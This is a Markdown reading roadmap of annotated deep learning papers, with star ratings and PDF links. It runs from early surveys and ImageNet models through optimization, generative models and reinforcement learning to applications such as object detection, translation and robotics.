**[0]** Bengio, Yoshua, Ian J. Goodfellow, and Aaron Courville. "**Deep learning**." An MIT Press book. (2015). [[html]](http://www.deeplearningbook.org/) **(Deep Learning Bible, you can read this book while reading the following papers.)** :star::star::star::star::star:

## 1.1 Survey

**[1]** LeCun, Yann, Yoshua Bengio, and Geoffrey Hinton. "**Deep learning**." Nature 521.7553 (2015): 436-444. [[pdf]](http://www.cs.toronto.edu/~hinton/absps/NatureDeepReview.pdf) **(Three Giants' Survey)** :star::star::star::star::star:

## 1.2 Deep Belief Network (DBN) (Milestone of Deep Learning Eve)

**[2]** Hinton, Geoffrey E., Simon Osindero, and Yee-Whye Teh. "**A fast learning algorithm for deep belief nets**." Neural computation 18.7 (2006): 1527-1554. [[pdf]](http://www.cs.toronto.edu/~hinton/absps/ncfast.pdf) **(Deep Learning Eve)** :star::star::star:

**[3]** Hinton, Geoffrey E., and Ruslan R. Salakhutdinov. "**Reducing the dimensionality of data with neural networks**." Science 313.5786 (2006): 504-507. [[pdf]](http://www.cs.toronto.edu/~hinton/science.pdf) **(Milestone, shows the promise of deep learning)** :star::star::star:

## 1.3 ImageNet Evolution (Deep Learning broke out from here)

**[4]** Krizhevsky, Alex, Ilya Sutskever, and Geoffrey E. Hinton. "**Imagenet classification with deep convolutional neural networks**." Advances in neural information processing systems. 2012. [[pdf]](http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf) **(AlexNet, Deep Learning Breakthrough)** :star::star::star::star::star:

**[5]** Simonyan, Karen, and Andrew Zisserman. "**Very deep convolutional networks for large-scale image recognition**." arXiv preprint arXiv:1409.1556 (2014). [[pdf]](https://arxiv.org/pdf/1409.1556.pdf) **(VGGNet, Neural Networks become very deep!)** :star::star::star:

**[6]** Szegedy, Christian, et al. "**Going deeper with convolutions**." Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2015. [[pdf]](http://www.cv-foundation.org/openaccess/content_cvpr_2015/papers/Szegedy_Going_Deeper_With_2015_CVPR_paper.pdf) **(GoogLeNet)** :star::star::star:

**[7]** He, Kaiming, et al. "**Deep residual learning for image recognition**." arXiv preprint arXiv:1512.03385 (2015). [[pdf]](https://arxiv.org/pdf/1512.03385.pdf) **(ResNet, Very very deep networks, CVPR best paper)** :star::star::star::star::star:

## 1.4 Speech Recognition Evolution

**[8]** Hinton, Geoffrey, et al. "**Deep neural networks for acoustic modeling in speech recognition: The shared views of four research groups**." IEEE Signal Processing Magazine 29.6 (2012): 82-97. [[pdf]](http://cs224d.stanford.edu/papers/maas_paper.pdf) **(Breakthrough in speech recognition)** :star::star::star::star:

**[9]** Graves, Alex, Abdel-rahman Mohamed, and Geoffrey Hinton. "**Speech recognition with deep recurrent neural networks**."
2013 IEEE international conference on acoustics, speech and signal processing. IEEE, 2013. [[pdf]](http://arxiv.org/pdf/1303.5778.pdf) **(RNN)** :star::star::star:

**[10]** Graves, Alex, and Navdeep Jaitly. "**Towards End-To-End Speech Recognition with Recurrent Neural Networks**." ICML. Vol. 14. 2014. [[pdf]](http://www.jmlr.org/proceedings/papers/v32/graves14.pdf) :star::star::star:

**[11]** Sak, Haşim, et al. "**Fast and accurate recurrent neural network acoustic models for speech recognition**." arXiv preprint arXiv:1507.06947 (2015). [[pdf]](http://arxiv.org/pdf/1507.06947) **(Google Speech Recognition System)** :star::star::star:

**[12]** Amodei, Dario, et al. "**Deep speech 2: End-to-end speech recognition in english and mandarin**." arXiv preprint arXiv:1512.02595 (2015). [[pdf]](https://arxiv.org/pdf/1512.02595.pdf) **(Baidu Speech Recognition System)** :star::star::star::star:

**[13]** W. Xiong, J. Droppo, X. Huang, F. Seide, M. Seltzer, A. Stolcke, D. Yu, G. Zweig. "**Achieving Human Parity in Conversational Speech Recognition**." arXiv preprint arXiv:1610.05256 (2016). [[pdf]](https://arxiv.org/pdf/1610.05256v1) **(State-of-the-art in speech recognition, Microsoft)** :star::star::star::star:

>After reading the above papers, you will have a basic understanding of Deep Learning history, the basic architectures of Deep Learning models (including CNN, RNN, and LSTM), and how deep learning can be applied to image and speech recognition problems. The following papers will give you an in-depth understanding of Deep Learning methods, Deep Learning applications in different areas, and the current frontiers. I suggest choosing from the following papers based on your interests and research direction.

# 2 Deep Learning Method

## 2.1 Model

**[14]** Hinton, Geoffrey E., et al. "**Improving neural networks by preventing co-adaptation of feature detectors**." arXiv preprint arXiv:1207.0580 (2012). [[pdf]](https://arxiv.org/pdf/1207.0580.pdf) **(Dropout)** :star::star::star:

**[15]** Srivastava, Nitish, et al. "**Dropout: a simple way to prevent neural networks from overfitting**." Journal of Machine Learning Research 15.1 (2014): 1929-1958. [[pdf]](https://www.cs.toronto.edu/~hinton/absps/JMLRdropout.pdf) :star::star::star:

**[16]** Ioffe, Sergey, and Christian Szegedy. "**Batch normalization: Accelerating deep network training by reducing internal covariate shift**." arXiv preprint arXiv:1502.03167 (2015). [[pdf]](http://arxiv.org/pdf/1502.03167) **(An outstanding Work in 2015)** :star::star::star::star:

**[17]** Ba, Jimmy Lei, Jamie Ryan Kiros, and Geoffrey E. Hinton. "**Layer normalization**." arXiv preprint arXiv:1607.06450 (2016). [[pdf]](https://arxiv.org/pdf/1607.06450.pdf?utm_source=sciontist.com&utm_medium=refer&utm_campaign=promote) **(Update of Batch Normalization)** :star::star::star::star:

**[18]** Courbariaux, Matthieu, et al. "**Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to +1 or −1**." [[pdf]](https://pdfs.semanticscholar.org/f832/b16cb367802609d91d400085eb87d630212a.pdf) **(New Model, Fast)** :star::star::star:

**[19]** Jaderberg, Max, et al. "**Decoupled neural interfaces using synthetic gradients**." arXiv preprint arXiv:1608.05343 (2016). [[pdf]](https://arxiv.org/pdf/1608.05343) **(Innovation of Training Method, Amazing Work)** :star::star::star::star::star:

**[20]** Chen, Tianqi, Ian Goodfellow, and Jonathon Shlens. "Net2net: Accelerating learning via knowledge transfer." arXiv preprint arXiv:1511.05641 (2015).
[[pdf]](https://arxiv.org/abs/1511.05641) **(Modify previously trained network to reduce training epochs)** :star::star::star: **[21]** Wei, Tao, et al. "Network Morphism." arXiv preprint arXiv:1603.01670 (2016). [[pdf]](https://arxiv.org/abs/1603.01670) **(Modify previously trained network to reduce training epochs)** :star::star::star: ## 2.2 Optimization **[22]** Sutskever, Ilya, et al. "**On the importance of initialization and momentum in deep learning**." ICML (3) 28 (2013): 1139-1147. [[pdf]](http://www.jmlr.org/proceedings/papers/v28/sutskever13.pdf) **(Momentum optimizer)** :star::star: **[23]** Kingma, Diederik, and Jimmy Ba. "**Adam: A method for stochastic optimization**." arXiv preprint arXiv:1412.6980 (2014). [[pdf]](http://arxiv.org/pdf/1412.6980) **(Maybe used most often currently)** :star::star::star: **[24]** Andrychowicz, Marcin, et al. "**Learning to learn by gradient descent by gradient descent**." arXiv preprint arXiv:1606.04474 (2016). [[pdf]](https://arxiv.org/pdf/1606.04474) **(Neural Optimizer,Amazing Work)** :star::star::star::star::star: **[25]** Han, Song, Huizi Mao, and William J. Dally. "**Deep compression: Compressing deep neural network with pruning, trained quantization and huffman coding**." CoRR, abs/1510.00149 2 (2015). [[pdf]](https://pdfs.semanticscholar.org/5b6c/9dda1d88095fa4aac1507348e498a1f2e863.pdf) **(ICLR best paper, new direction to make NN running fast,DeePhi Tech Startup)** :star::star::star::star::star: **[26]** Iandola, Forrest N., et al. "**SqueezeNet: AlexNet-level accuracy with 50x fewer parameters and< 1MB model size**." arXiv preprint arXiv:1602.07360 (2016). [[pdf]](http://arxiv.org/pdf/1602.07360) **(Also a new direction to optimize NN,DeePhi Tech Startup)** :star::star::star::star: **[27]** Glorat Xavier, Bengio Yoshua, et al. "**Understanding the difficulty of training deep forward neural networks**." Proceedings of the thirteenth International Conference on Artificial Intelligence and Statistics, PMLR 9:249-256,2010. [[pdf]](http://proceedings.mlr.press/v9/glorot10a/glorot10a.pdf) :star::star::star::star: ## 2.3 Unsupervised Learning / Deep Generative Model **[28]** Le, Quoc V. "**Building high-level features using large scale unsupervised learning**." 2013 IEEE international conference on acoustics, speech and signal processing. IEEE, 2013. [[pdf]](http://arxiv.org/pdf/1112.6209.pdf&embed) **(Milestone, Andrew Ng, Google Brain Project, Cat)** :star::star::star::star: **[29]** Kingma, Diederik P., and Max Welling. "**Auto-encoding variational bayes**." arXiv preprint arXiv:1312.6114 (2013). [[pdf]](http://arxiv.org/pdf/1312.6114) **(VAE)** :star::star::star::star: **[30]** Goodfellow, Ian, et al. "**Generative adversarial nets**." Advances in Neural Information Processing Systems. 2014. [[pdf]](http://papers.nips.cc/paper/5423-generative-adversarial-nets.pdf) **(GAN,super cool idea)** :star::star::star::star::star: **[31]** Radford, Alec, Luke Metz, and Soumith Chintala. "**Unsupervised representation learning with deep convolutional generative adversarial networks**." arXiv preprint arXiv:1511.06434 (2015). [[pdf]](http://arxiv.org/pdf/1511.06434) **(DCGAN)** :star::star::star::star: **[32]** Gregor, Karol, et al. "**DRAW: A recurrent neural network for image generation**." arXiv preprint arXiv:1502.04623 (2015). [[pdf]](http://jmlr.org/proceedings/papers/v37/gregor15.pdf) **(VAE with attention, outstanding work)** :star::star::star::star::star: **[33]** Oord, Aaron van den, Nal Kalchbrenner, and Koray Kavukcuoglu. 
"**Pixel recurrent neural networks**." arXiv preprint arXiv:1601.06759 (2016). [[pdf]](http://arxiv.org/pdf/1601.06759) **(PixelRNN)** :star::star::star::star: **[34]** Oord, Aaron van den, et al. "Conditional image generation with PixelCNN decoders." arXiv preprint arXiv:1606.05328 (2016). [[pdf]](https://arxiv.org/pdf/1606.05328) **(PixelCNN)** :star::star::star::star: **[34]** S. Mehri et al., "**SampleRNN: An Unconditional End-to-End Neural Audio Generation Model**." arXiv preprint arXiv:1612.07837 (2016). [[pdf]](https://arxiv.org/pdf/1612.07837.pdf) :star::star::star::star::star: ## 2.4 RNN / Sequence-to-Sequence Model **[35]** Graves, Alex. "**Generating sequences with recurrent neural networks**." arXiv preprint arXiv:1308.0850 (2013). [[pdf]](http://arxiv.org/pdf/1308.0850) **(LSTM, very nice generating result, show the power of RNN)** :star::star::star::star: **[36]** Cho, Kyunghyun, et al. "**Learning phrase representations using RNN encoder-decoder for statistical machine translation**." arXiv preprint arXiv:1406.1078 (2014). [[pdf]](http://arxiv.org/pdf/1406.1078) **(First Seq-to-Seq Paper)** :star::star::star::star: **[37]** Sutskever, Ilya, Oriol Vinyals, and Quoc V. Le. "**Sequence to sequence learning with neural networks**." Advances in neural information processing systems. 2014. [[pdf]](https://arxiv.org/pdf/1409.3215.pdf) **(Outstanding Work)** :star::star::star::star::star: **[38]** Bahdanau, Dzmitry, KyungHyun Cho, and Yoshua Bengio. "**Neural Machine Translation by Jointly Learning to Align and Translate**." arXiv preprint arXiv:1409.0473 (2014). [[pdf]](https://arxiv.org/pdf/1409.0473v7.pdf) :star::star::star::star: **[39]** Vinyals, Oriol, and Quoc Le. "**A neural conversational model**." arXiv preprint arXiv:1506.05869 (2015). [[pdf]](http://arxiv.org/pdf/1506.05869.pdf%20(http://arxiv.org/pdf/1506.05869.pdf)) **(Seq-to-Seq on Chatbot)** :star::star::star: ## 2.5 Neural Turing Machine **[40]** Graves, Alex, Greg Wayne, and Ivo Danihelka. "**Neural turing machines**." arXiv preprint arXiv:1410.5401 (2014). [[pdf]](http://arxiv.org/pdf/1410.5401.pdf) **(Basic Prototype of Future Computer)** :star::star::star::star::star: **[41]** Zaremba, Wojciech, and Ilya Sutskever. "**Reinforcement learning neural Turing machines**." arXiv preprint arXiv:1505.00521 362 (2015). [[pdf]](https://pdfs.semanticscholar.org/f10e/071292d593fef939e6ef4a59baf0bb3a6c2b.pdf) :star::star::star: **[42]** Weston, Jason, Sumit Chopra, and Antoine Bordes. "**Memory networks**." arXiv preprint arXiv:1410.3916 (2014). [[pdf]](http://arxiv.org/pdf/1410.3916) :star::star::star: **[43]** Sukhbaatar, Sainbayar, Jason Weston, and Rob Fergus. "**End-to-end memory networks**." Advances in neural information processing systems. 2015. [[pdf]](http://papers.nips.cc/paper/5846-end-to-end-memory-networks.pdf) :star::star::star::star: **[44]** Vinyals, Oriol, Meire Fortunato, and Navdeep Jaitly. "**Pointer networks**." Advances in Neural Information Processing Systems. 2015. [[pdf]](http://papers.nips.cc/paper/5866-pointer-networks.pdf) :star::star::star::star: **[45]** Graves, Alex, et al. "**Hybrid computing using a neural network with dynamic external memory**." Nature (2016). [[pdf]](https://www.dropbox.com/s/0a40xi702grx3dq/2016-graves.pdf) **(Milestone,combine above papers' ideas)** :star::star::star::star::star: ## 2.6 Deep Reinforcement Learning **[46]** Mnih, Volodymyr, et al. "**Playing atari with deep reinforcement learning**." arXiv preprint arXiv:1312.5602 (2013). 
[[pdf]](http://arxiv.org/pdf/1312.5602.pdf)) **(First Paper named deep reinforcement learning)** :star::star::star::star: **[47]** Mnih, Volodymyr, et al. "**Human-level control through deep reinforcement learning**." Nature 518.7540 (2015): 529-533. [[pdf]](https://storage.googleapis.com/deepmind-data/assets/papers/DeepMindNature14236Paper.pdf) **(Milestone)** :star::star::star::star::star: **[48]** Wang, Ziyu, Nando de Freitas, and Marc Lanctot. "**Dueling network architectures for deep reinforcement learning**." arXiv preprint arXiv:1511.06581 (2015). [[pdf]](http://arxiv.org/pdf/1511.06581) **(ICLR best paper,great idea)** :star::star::star::star: **[49]** Mnih, Volodymyr, et al. "**Asynchronous methods for deep reinforcement learning**." arXiv preprint arXiv:1602.01783 (2016). [[pdf]](http://arxiv.org/pdf/1602.01783) **(State-of-the-art method)** :star::star::star::star::star: **[50]** Lillicrap, Timothy P., et al. "**Continuous control with deep reinforcement learning**." arXiv preprint arXiv:1509.02971 (2015). [[pdf]](http://arxiv.org/pdf/1509.02971) **(DDPG)** :star::star::star::star: **[51]** Gu, Shixiang, et al. "**Continuous Deep Q-Learning with Model-based Acceleration**." arXiv preprint arXiv:1603.00748 (2016). [[pdf]](http://arxiv.org/pdf/1603.00748) **(NAF)** :star::star::star::star: **[52]** Schulman, John, et al. "**Trust region policy optimization**." CoRR, abs/1502.05477 (2015). [[pdf]](http://www.jmlr.org/proceedings/papers/v37/schulman15.pdf) **(TRPO)** :star::star::star::star: **[53]** Silver, David, et al. "**Mastering the game of Go with deep neural networks and tree search**." Nature 529.7587 (2016): 484-489. [[pdf]](http://willamette.edu/~levenick/cs448/goNature.pdf) **(AlphaGo)** :star::star::star::star::star: ## 2.7 Deep Transfer Learning / Lifelong Learning / especially for RL **[54]** Bengio, Yoshua. "**Deep Learning of Representations for Unsupervised and Transfer Learning**." ICML Unsupervised and Transfer Learning 27 (2012): 17-36. [[pdf]](http://www.jmlr.org/proceedings/papers/v27/bengio12a/bengio12a.pdf) **(A Tutorial)** :star::star::star: **[55]** Silver, Daniel L., Qiang Yang, and Lianghao Li. "**Lifelong Machine Learning Systems: Beyond Learning Algorithms**." AAAI Spring Symposium: Lifelong Machine Learning. 2013. [[pdf]](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.696.7800&rep=rep1&type=pdf) **(A brief discussion about lifelong learning)** :star::star::star: **[56]** Hinton, Geoffrey, Oriol Vinyals, and Jeff Dean. "**Distilling the knowledge in a neural network**." arXiv preprint arXiv:1503.02531 (2015). [[pdf]](http://arxiv.org/pdf/1503.02531) **(Godfather's Work)** :star::star::star::star: **[57]** Rusu, Andrei A., et al. "**Policy distillation**." arXiv preprint arXiv:1511.06295 (2015). [[pdf]](http://arxiv.org/pdf/1511.06295) **(RL domain)** :star::star::star: **[58]** Parisotto, Emilio, Jimmy Lei Ba, and Ruslan Salakhutdinov. "**Actor-mimic: Deep multitask and transfer reinforcement learning**." arXiv preprint arXiv:1511.06342 (2015). [[pdf]](http://arxiv.org/pdf/1511.06342) **(RL domain)** :star::star::star: **[59]** Rusu, Andrei A., et al. "**Progressive neural networks**." arXiv preprint arXiv:1606.04671 (2016). [[pdf]](https://arxiv.org/pdf/1606.04671) **(Outstanding Work, A novel idea)** :star::star::star::star::star: ## 2.8 One Shot Deep Learning **[60]** Lake, Brenden M., Ruslan Salakhutdinov, and Joshua B. Tenenbaum. "**Human-level concept learning through probabilistic program induction**." 
Science 350.6266 (2015): 1332-1338. [[pdf]](http://clm.utexas.edu/compjclub/wp-content/uploads/2016/02/lake2015.pdf) **(No Deep Learning,but worth reading)** :star::star::star::star::star: **[61]** Koch, Gregory, Richard Zemel, and Ruslan Salakhutdinov. "**Siamese Neural Networks for One-shot Image Recognition**."(2015) [[pdf]](http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf) :star::star::star: **[62]** Santoro, Adam, et al. "**One-shot Learning with Memory-Augmented Neural Networks**." arXiv preprint arXiv:1605.06065 (2016). [[pdf]](http://arxiv.org/pdf/1605.06065) **(A basic step to one shot learning)** :star::star::star::star: **[63]** Vinyals, Oriol, et al. "**Matching Networks for One Shot Learning**." arXiv preprint arXiv:1606.04080 (2016). [[pdf]](https://arxiv.org/pdf/1606.04080) :star::star::star: **[64]** Hariharan, Bharath, and Ross Girshick. "**Low-shot visual object recognition**." arXiv preprint arXiv:1606.02819 (2016). [[pdf]](http://arxiv.org/pdf/1606.02819) **(A step to large data)** :star::star::star::star: # 3 Applications ## 3.1 NLP(Natural Language Processing) **[1]** Antoine Bordes, et al. "**Joint Learning of Words and Meaning Representations for Open-Text Semantic Parsing**." AISTATS(2012) [[pdf]](https://www.hds.utc.fr/~bordesan/dokuwiki/lib/exe/fetch.php?id=en%3Apubli&cache=cache&media=en:bordes12aistats.pdf) :star::star::star::star: **[2]** Mikolov, et al. "**Distributed representations of words and phrases and their compositionality**." ANIPS(2013): 3111-3119 [[pdf]](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) **(word2vec)** :star::star::star: **[3]** Sutskever, et al. "**“Sequence to sequence learning with neural networks**." ANIPS(2014) [[pdf]](http://papers.nips.cc/paper/5346-sequence-to-sequence-learning-with-neural-networks.pdf) :star::star::star: **[4]** Ankit Kumar, et al. "**“Ask Me Anything: Dynamic Memory Networks for Natural Language Processing**." arXiv preprint arXiv:1506.07285(2015) [[pdf]](https://arxiv.org/abs/1506.07285) :star::star::star::star: **[5]** Yoon Kim, et al. "**Character-Aware Neural Language Models**." NIPS(2015) arXiv preprint arXiv:1508.06615(2015) [[pdf]](https://arxiv.org/abs/1508.06615) :star::star::star::star: **[6]** Jason Weston, et al. "**Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks**." arXiv preprint arXiv:1502.05698(2015) [[pdf]](https://arxiv.org/abs/1502.05698) **(bAbI tasks)** :star::star::star: **[7]** Karl Moritz Hermann, et al. "**Teaching Machines to Read and Comprehend**." arXiv preprint arXiv:1506.03340(2015) [[pdf]](https://arxiv.org/abs/1506.03340) **(CNN/DailyMail cloze style questions)** :star::star: **[8]** Alexis Conneau, et al. "**Very Deep Convolutional Networks for Natural Language Processing**." arXiv preprint arXiv:1606.01781(2016) [[pdf]](https://arxiv.org/abs/1606.01781) **(state-of-the-art in text classification)** :star::star::star: **[9]** Armand Joulin, et al. "**Bag of Tricks for Efficient Text Classification**." arXiv preprint arXiv:1607.01759(2016) [[pdf]](https://arxiv.org/abs/1607.01759) **(slightly worse than state-of-the-art, but a lot faster)** :star::star::star: ## 3.2 Object Detection **[1]** Szegedy, Christian, Alexander Toshev, and Dumitru Erhan. "**Deep neural networks for object detection**." Advances in Neural Information Processing Systems. 2013. 
[[pdf]](http://papers.nips.cc/paper/5207-deep-neural-networks-for-object-detection.pdf) :star::star::star: **[2]** Girshick, Ross, et al. "**Rich feature hierarchies for accurate object detection and semantic segmentation**." Proceedings of the IEEE conference on computer vision and pattern recognition. 2014. [[pdf]](http://www.cv-foundation.org/openaccess/content_cvpr_2014/papers/Girshick_Rich_Feature_Hierarchies_2014_CVPR_paper.pdf) **(RCNN)** :star::star::star::star::star: **[3]** He, Kaiming, et al. "**Spatial pyramid pooling in deep convolutional networks for visual recognition**." European Conference on Computer Vision. Springer International Publishing, 2014. [[pdf]](http://arxiv.org/pdf/1406.4729) **(SPPNet)** :star::star::star::star: **[4]** Girshick, Ross. "**Fast r-cnn**." Proceedings of the IEEE International Conference on Computer Vision. 2015. [[pdf]](https://pdfs.semanticscholar.org/8f67/64a59f0d17081f2a2a9d06f4ed1cdea1a0ad.pdf) :star::star::star::star: **[5]** Ren, Shaoqing, et al. "**Faster R-CNN: Towards real-time object detection with region proposal networks**." Advances in neural information processing systems. 2015. [[pdf]](https://arxiv.org/pdf/1506.01497.pdf) :star::star::star::star: **[6]** Redmon, Joseph, et al. "**You only look once: Unified, real-time object detection**." arXiv preprint arXiv:1506.02640 (2015). [[pdf]](http://homes.cs.washington.edu/~ali/papers/YOLO.pdf) **(YOLO,Oustanding Work, really practical)** :star::star::star::star::star: **[7]** Liu, Wei, et al. "**SSD: Single Shot MultiBox Detector**." arXiv preprint arXiv:1512.02325 (2015). [[pdf]](http://arxiv.org/pdf/1512.02325) :star::star::star: **[8]** Dai, Jifeng, et al. "**R-FCN: Object Detection via Region-based Fully Convolutional Networks**." arXiv preprint arXiv:1605.06409 (2016). [[pdf]](https://arxiv.org/abs/1605.06409) :star::star::star::star: **[9]** He, Gkioxari, et al. "**Mask R-CNN**" arXiv preprint arXiv:1703.06870 (2017). [[pdf]](https://arxiv.org/abs/1703.06870) :star::star::star::star: **[10]** Bochkovskiy, Alexey, et al. "**YOLOv4: Optimal Speed and Accuracy of Object Detection.**" arXiv preprint arXiv:2004.10934 (2020). [[pdf]](https://arxiv.org/pdf/2004.10934) :star::star::star::star: **[11]** Tan, Mingxing, et al. “**EfficientDet: Scalable and Efficient Object Detection.**" arXiv preprint arXiv:1911.09070 (2019). [[pdf]](https://arxiv.org/pdf/1911.09070) :star::star::star::star::star: ## 3.3 Visual Tracking **[1]** Wang, Naiyan, and Dit-Yan Yeung. "**Learning a deep compact image representation for visual tracking**." Advances in neural information processing systems. 2013. [[pdf]](http://papers.nips.cc/paper/5192-learning-a-deep-compact-image-representation-for-visual-tracking.pdf) **(First Paper to do visual tracking using Deep Learning,DLT Tracker)** :star::star::star: **[2]** Wang, Naiyan, et al. "**Transferring rich feature hierarchies for robust visual tracking**." arXiv preprint arXiv:1501.04587 (2015). [[pdf]](http://arxiv.org/pdf/1501.04587) **(SO-DLT)** :star::star::star::star: **[3]** Wang, Lijun, et al. "**Visual tracking with fully convolutional networks**." Proceedings of the IEEE International Conference on Computer Vision. 2015. [[pdf]](http://www.cv-foundation.org/openaccess/content_iccv_2015/papers/Wang_Visual_Tracking_With_ICCV_2015_paper.pdf) **(FCNT)** :star::star::star::star: **[4]** Held, David, Sebastian Thrun, and Silvio Savarese. "**Learning to Track at 100 FPS with Deep Regression Networks**." arXiv preprint arXiv:1604.01802 (2016). 
[[pdf]](http://arxiv.org/pdf/1604.01802) **(GOTURN,Really fast as a deep learning method,but still far behind un-deep-learning methods)** :star::star::star::star: **[5]** Bertinetto, Luca, et al. "**Fully-Convolutional Siamese Networks for Object Tracking**." arXiv preprint arXiv:1606.09549 (2016). [[pdf]](https://arxiv.org/pdf/1606.09549) **(SiameseFC,New state-of-the-art for real-time object tracking)** :star::star::star::star: **[6]** Martin Danelljan, Andreas Robinson, Fahad Khan, Michael Felsberg. "**Beyond Correlation Filters: Learning Continuous Convolution Operators for Visual Tracking**." ECCV (2016) [[pdf]](http://www.cvl.isy.liu.se/research/objrec/visualtracking/conttrack/C-COT_ECCV16.pdf) **(C-COT)** :star::star::star::star: **[7]** Nam, Hyeonseob, Mooyeol Baek, and Bohyung Han. "**Modeling and Propagating CNNs in a Tree Structure for Visual Tracking**." arXiv preprint arXiv:1608.07242 (2016). [[pdf]](https://arxiv.org/pdf/1608.07242) **(VOT2016 Winner,TCNN)** :star::star::star::star: ## 3.4 Image Caption **[1]** Farhadi,Ali,etal. "**Every picture tells a story: Generating sentences from images**". In Computer VisionECCV 2010. Springer Berlin Heidelberg:15-29, 2010. [[pdf]](https://www.cs.cmu.edu/~afarhadi/papers/sentence.pdf) :star::star::star: **[2]** Kulkarni, Girish, et al. "**Baby talk: Understanding and generating image descriptions**". In Proceedings of the 24th CVPR, 2011. [[pdf]](http://tamaraberg.com/papers/generation_cvpr11.pdf):star::star::star::star: **[3]** Vinyals, Oriol, et al. "**Show and tell: A neural image caption generator**". In arXiv preprint arXiv:1411.4555, 2014. [[pdf]](https://arxiv.org/pdf/1411.4555.pdf):star::star::star: **[4]** Donahue, Jeff, et al. "**Long-term recurrent convolutional networks for visual recognition and description**". In arXiv preprint arXiv:1411.4389 ,2014. [[pdf]](https://arxiv.org/pdf/1411.4389.pdf) **[5]** Karpathy, Andrej, and Li Fei-Fei. "**Deep visual-semantic alignments for generating image descriptions**". In arXiv preprint arXiv:1412.2306, 2014. [[pdf]](https://cs.stanford.edu/people/karpathy/cvpr2015.pdf):star::star::star::star::star: **[6]** Karpathy, Andrej, Armand Joulin, and Fei Fei F. Li. "**Deep fragment embeddings for bidirectional image sentence mapping**". In Advances in neural information processing systems, 2014. [[pdf]](https://arxiv.org/pdf/1406.5679v1.pdf):star::star::star::star: **[7]** Fang, Hao, et al. "**From captions to visual concepts and back**". In arXiv preprint arXiv:1411.4952, 2014. [[pdf]](https://arxiv.org/pdf/1411.4952v3.pdf):star::star::star::star::star: **[8]** Chen, Xinlei, and C. Lawrence Zitnick. "**Learning a recurrent visual representation for image caption generation**". In arXiv preprint arXiv:1411.5654, 2014. [[pdf]](https://arxiv.org/pdf/1411.5654v1.pdf):star::star::star::star: **[9]** Mao, Junhua, et al. "**Deep captioning with multimodal recurrent neural networks (m-rnn)**". In arXiv preprint arXiv:1412.6632, 2014. [[pdf]](https://arxiv.org/pdf/1412.6632v5.pdf):star::star::star: **[10]** Xu, Kelvin, et al. "**Show, attend and tell: Neural image caption generation with visual attention**". In arXiv preprint arXiv:1502.03044, 2015. [[pdf]](https://arxiv.org/pdf/1502.03044v3.pdf):star::star::star::star::star: ## 3.5 Machine Translation > Some milestone papers are listed in RNN / Seq-to-Seq topic. **[1]** Luong, Minh-Thang, et al. "**Addressing the rare word problem in neural machine translation**." arXiv preprint arXiv:1410.8206 (2014). 
[[pdf]](http://arxiv.org/pdf/1410.8206) :star::star::star::star: **[2]** Sennrich, et al. "**Neural Machine Translation of Rare Words with Subword Units**". In arXiv preprint arXiv:1508.07909, 2015. [[pdf]](https://arxiv.org/pdf/1508.07909.pdf):star::star::star: **[3]** Luong, Minh-Thang, Hieu Pham, and Christopher D. Manning. "**Effective approaches to attention-based neural machine translation**." arXiv preprint arXiv:1508.04025 (2015). [[pdf]](http://arxiv.org/pdf/1508.04025) :star::star::star::star: **[4]** Chung, et al. "**A Character-Level Decoder without Explicit Segmentation for Neural Machine Translation**". In arXiv preprint arXiv:1603.06147, 2016. [[pdf]](https://arxiv.org/pdf/1603.06147.pdf):star::star: **[5]** Lee, et al. "**Fully Character-Level Neural Machine Translation without Explicit Segmentation**". In arXiv preprint arXiv:1610.03017, 2016. [[pdf]](https://arxiv.org/pdf/1610.03017.pdf):star::star::star::star::star: **[6]** Wu, Schuster, Chen, Le, et al. "**Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation**". In arXiv preprint arXiv:1609.08144v2, 2016. [[pdf]](https://arxiv.org/pdf/1609.08144v2.pdf) **(Milestone)** :star::star::star::star: ## 3.6 Robotics **[1]** Koutník, Jan, et al. "**Evolving large-scale neural networks for vision-based reinforcement learning**." Proceedings of the 15th annual conference on Genetic and evolutionary computation. ACM, 2013. [[pdf]](http://repository.supsi.ch/4550/1/koutnik2013gecco.pdf) :star::star::star: **[2]** Levine, Sergey, et al. "**End-to-end training of deep visuomotor policies**." Journal of Machine Learning Research 17.39 (2016): 1-40. [[pdf]](http://www.jmlr.org/papers/volume17/15-522/15-522.pdf) :star::star::star::star::star: **[3]** Pinto, Lerrel, and Abhinav Gupta. "**Supersizing self-supervision: Learning to grasp from 50k tries and 700 robot hours**." arXiv preprint arXiv:1509.06825 (2015). [[pdf]](http://arxiv.org/pdf/1509.06825) :star::star::star: **[4]** Levine, Sergey, et al. "**Learning Hand-Eye Coordination for Robotic Grasping with Deep Learning and Large-Scale Data Collection**." arXiv preprint arXiv:1603.02199 (2016). [[pdf]](http://arxiv.org/pdf/1603.02199) :star::star::star::star: **[5]** Zhu, Yuke, et al. "**Target-driven Visual Navigation in Indoor Scenes using Deep Reinforcement Learning**." arXiv preprint arXiv:1609.05143 (2016). [[pdf]](https://arxiv.org/pdf/1609.05143) :star::star::star::star: **[6]** Yahya, Ali, et al. "**Collective Robot Reinforcement Learning with Distributed Asynchronous Guided Policy Search**." arXiv preprint arXiv:1610.00673 (2016). [[pdf]](https://arxiv.org/pdf/1610.00673) :star::star::star::star: **[7]** Gu, Shixiang, et al. "**Deep Reinforcement Learning for Robotic Manipulation**." arXiv preprint arXiv:1610.00633 (2016). [[pdf]](https://arxiv.org/pdf/1610.00633) :star::star::star::star: **[8]** A Rusu, M Vecerik, Thomas Rothörl, N Heess, R Pascanu, R Hadsell."**Sim-to-Real Robot Learning from Pixels with Progressive Nets**." arXiv preprint arXiv:1610.04286 (2016). [[pdf]](https://arxiv.org/pdf/1610.04286.pdf) :star::star::star::star: **[9]** Mirowski, Piotr, et al. "**Learning to navigate in complex environments**." arXiv preprint arXiv:1611.03673 (2016). [[pdf]](https://arxiv.org/pdf/1611.03673) :star::star::star::star: ## 3.7 Art **[1]** Mordvintsev, Alexander; Olah, Christopher; Tyka, Mike (2015). "**Inceptionism: Going Deeper into Neural Networks**". Google Research. 
